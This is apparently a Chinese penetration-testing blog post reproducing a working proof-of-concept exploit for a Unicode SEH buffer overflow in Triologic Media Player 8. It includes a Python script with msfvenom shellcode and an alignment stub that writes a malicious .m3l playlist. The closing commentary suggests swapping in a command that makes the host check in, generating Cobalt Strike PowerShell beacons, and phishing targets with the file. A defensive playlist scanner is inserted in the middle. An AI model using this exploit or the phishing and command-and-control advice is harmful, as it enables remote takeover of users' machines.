Penetration Testing | Triologic Media Player 8 .m3l Buffer Overflow (Unicode) (SEH)

2022-09-08 11:39:05


Exploit code

# Exploit Title: Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH)
# Date: 2020-04-04
# Author: Felipe Winsnes
# Software Link: http://download.cnet.com/Triologic-Media-Player/3000-2139_4-10691520.html
# Version: 8
# Tested on: Windows 7 (x86)

# Proof of Concept:
# 1.- Run the python script, it will create a new file called "poc.m3l".
# 2.- Open the Application.
# 3.- Some windows warning boxes regarding sound issues may pop up, just click OK.
# 4.- Click on the bottom-right button that displays an arrow and has written "LIST".
# 5.- Select the file "poc.m3l".
# 6.- Profit.

import struct

# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/unicode_mixed BufferRegister=EAX EXITFUNC=thread
# Payload size: 512 bytes

buf =  b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += b"\x47\x42\x39\x75\x34\x4a\x42\x79\x6c\x7a\x48\x61\x72"
buf += b"\x39\x70\x6b\x50\x49\x70\x73\x30\x54\x49\x47\x75\x70"
buf += b"\x31\x79\x30\x4f\x74\x72\x6b\x70\x50\x70\x30\x32\x6b"
buf += b"\x51\x42\x7a\x6c\x74\x4b\x42\x32\x6e\x34\x64\x4b\x64"
buf += b"\x32\x6b\x78\x6c\x4f\x57\x47\x4d\x7a\x4d\x56\x4e\x51"
buf += b"\x59\x6f\x46\x4c\x4f\x4c\x71\x51\x61\x6c\x49\x72\x4c"
buf += b"\x6c\x6d\x50\x36\x61\x46\x6f\x6c\x4d\x4a\x61\x37\x57"
buf += b"\x69\x52\x7a\x52\x31\x42\x51\x47\x74\x4b\x6e\x72\x4a"
buf += b"\x70\x44\x4b\x30\x4a\x4d\x6c\x34\x4b\x6e\x6c\x5a\x71"
buf += b"\x74\x38\x39\x53\x6d\x78\x49\x71\x5a\x31\x70\x51\x62"
buf += b"\x6b\x70\x59\x6b\x70\x5a\x61\x46\x73\x62\x6b\x4e\x69"
buf += b"\x4a\x78\x48\x63\x4f\x4a\x61\x39\x72\x6b\x4d\x64\x62"
buf += b"\x6b\x4a\x61\x36\x76\x4c\x71\x59\x6f\x44\x6c\x45\x71"
buf += b"\x58\x4f\x6a\x6d\x49\x71\x39\x37\x4d\x68\x39\x50\x73"
buf += b"\x45\x58\x76\x69\x73\x43\x4d\x4c\x38\x4f\x4b\x31\x6d"
buf += b"\x4c\x64\x72\x55\x58\x64\x72\x38\x62\x6b\x30\x58\x4f"
buf += b"\x34\x6a\x61\x7a\x33\x31\x56\x54\x4b\x4c\x4c\x6e\x6b"
buf += b"\x44\x4b\x50\x58\x4d\x4c\x4a\x61\x38\x53\x72\x6b\x5a"
buf += b"\x64\x54\x4b\x5a\x61\x58\x50\x33\x59\x61\x34\x6d\x54"
buf += b"\x6c\x64\x71\x4b\x51\x4b\x6f\x71\x62\x39\x70\x5a\x6f"
buf += b"\x61\x79\x6f\x47\x70\x61\x4f\x61\x4f\x71\x4a\x44\x4b"
buf += b"\x4d\x42\x38\x6b\x34\x4d\x4f\x6d\x42\x4a\x49\x71\x62"
buf += b"\x6d\x42\x65\x45\x62\x69\x70\x39\x70\x59\x70\x50\x50"
buf += b"\x51\x58\x4d\x61\x74\x4b\x42\x4f\x33\x57\x6b\x4f\x46"
buf += b"\x75\x37\x4b\x47\x70\x6b\x4d\x6e\x4a\x5a\x6a\x53\x38"
buf += b"\x46\x46\x52\x75\x65\x6d\x45\x4d\x6b\x4f\x57\x65\x6d"
buf += b"\x6c\x7a\x66\x43\x4c\x6c\x4a\x35\x30\x59\x6b\x67\x70"
buf += b"\x50\x75\x6b\x55\x45\x6b\x4d\x77\x5a\x73\x32\x52\x52"
buf += b"\x4f\x30\x6a\x59\x70\x51\x43\x69\x6f\x38\x55\x52\x43"
buf += b"\x50\x61\x32\x4c\x61\x53\x6c\x6e\x43\x35\x51\x68\x6f"
buf += b"\x75\x4d\x30\x41\x41"

# nSEH / SEH overwrite. The player converts the playlist to Unicode, so every
# byte below is written to memory followed by a 0x00.
nseh = b"\x71\x41"
seh = b"\x41\x4a"

# Unicode-safe alignment stub: derive a pointer to the shellcode in EAX and
# jump to it. Each \x71 (jno +0 once the 0x00 is inserted) is a no-op that
# absorbs the inserted null byte.
alignment = b""
alignment += b"\x54\x71"       # push esp, padding
alignment += b"\x58\x71"       # pop eax, padding
alignment += b"\x05\x20\x22"   # add eax, 0x22002000
alignment += b"\x71"           # Padding
alignment += b"\x2D\x19\x22"   # sub eax, 0x22001900
alignment += b"\x71"           # Padding
alignment += b"\x50\x71"       # push eax, padding
alignment += b"\xC3"           # retn

buffer = b"A" * 536 + nseh + seh + b"\x41\x71\x41\x71" + alignment + b"C" * 71 + buf + b"C" * 2000
f = open("poc.m3l", "wb")   # binary mode so no byte is altered on write
f.write(buffer)
f.close()

Reproducing the exploit

Triologic Media Player is a free media player. Version 8 has a buffer overflow that allows arbitrary code execution (beware of hosts checking in).

Use

msfvenom -p windows/exec CMD=calc.exe -f py -e x86/unicode_mixed BufferRegister=EAX EXITFUNC=thread

to generate the payload, then replace buf with the output.

The value of the CMD parameter is the cmd command to execute; you all know what that means.

Then run the Python script. It generates a poc.m3l file in the script's directory; if that file is opened with Triologic Media Player 8, the preset CMD command is executed.
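From the defender's side, here is an added example (not part of the original post or of the exploit above) that flags .m3l/.m3u playlist files shaped like the PoC file: a single oversized entry, long runs of filler bytes, and raw control bytes where only paths or URLs belong. Thresholds, the sample playlists and the function names are constructed for this example.

```python
import re

# Constructed thresholds for this example. Playlist entries are file paths or
# URLs, so a single entry of several hundred bytes is already abnormal; the
# PoC on this page begins with 536 filler bytes before the SEH overwrite.
MAX_ENTRY_LEN = 512
MIN_FILLER_RUN = 64

# Constructed sample inputs (not taken from the page).
BENIGN_PLAYLIST = (
    b"C:\\Music\\track01.mp3\r\n"
    b"C:\\Music\\track02.mp3\r\n"
    b"http://example.invalid/stream.mp3\r\n"
)
# Same shape as the PoC file: one huge entry of filler, a few raw opcode
# bytes, then more filler. This is not the exploit itself.
SUSPICIOUS_PLAYLIST = b"A" * 600 + b"\x05\x20\x22" + b"C" * 100


def scan_playlist(data: bytes) -> list:
    """Return human-readable findings for the raw bytes of a playlist file."""
    findings = []
    # A file with no line terminator at all is one single entry, like the PoC.
    entries = data.splitlines() or [b""]
    for idx, entry in enumerate(entries, start=1):
        if len(entry) > MAX_ENTRY_LEN:
            findings.append(f"entry {idx}: length {len(entry)} > {MAX_ENTRY_LEN}")
        # Long runs of one byte are overflow padding, not a path.
        run = re.search(rb"(.)\1{%d,}" % (MIN_FILLER_RUN - 1), entry, re.DOTALL)
        if run:
            findings.append(
                f"entry {idx}: {len(run.group(0))} repeated bytes of {run.group(1)!r}"
            )
        # Control bytes (other than TAB) never belong in a path or URL.
        ctrl = sum(1 for b in entry if b < 0x20 and b != 0x09)
        if ctrl:
            findings.append(f"entry {idx}: {ctrl} control byte(s)")
    return findings


def is_suspicious(data: bytes) -> bool:
    return bool(scan_playlist(data))


if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_PLAYLIST), ("suspicious", SUSPICIOUS_PLAYLIST)):
        print(name, scan_playlist(sample) or "clean")
```

The same checks can be run on playlist files delivered as mail attachments before they reach a workstation with the player installed.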

Here you can use CS to generate a PowerShell check-in command and bring the host online directly.

Win10 does not ship this thing by default. The script's author tested it successfully on Win7; it is unclear whether Triologic Media Player is the default handler for .m3l files on Win7.

If it is, then for machines within a certain scope you could try a round of phishing.
